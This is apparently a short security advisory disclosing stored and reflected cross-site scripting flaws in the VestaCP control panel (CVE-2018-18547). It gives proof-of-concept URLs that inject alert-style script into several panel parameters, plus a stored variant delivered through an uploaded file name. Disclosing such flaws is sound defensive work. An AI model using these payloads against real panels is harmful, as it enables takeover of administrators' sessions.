[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr
[~] Description:
Insert any XSS payload. I will use <img src onerror=alert(1337)>
https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file as named xss payload, using any form in your website.
If VestaCP user see this file in the interface, his browser will run the JavaScript.
So this vulnerability makes high risk.
https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS
https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS
// for secure days...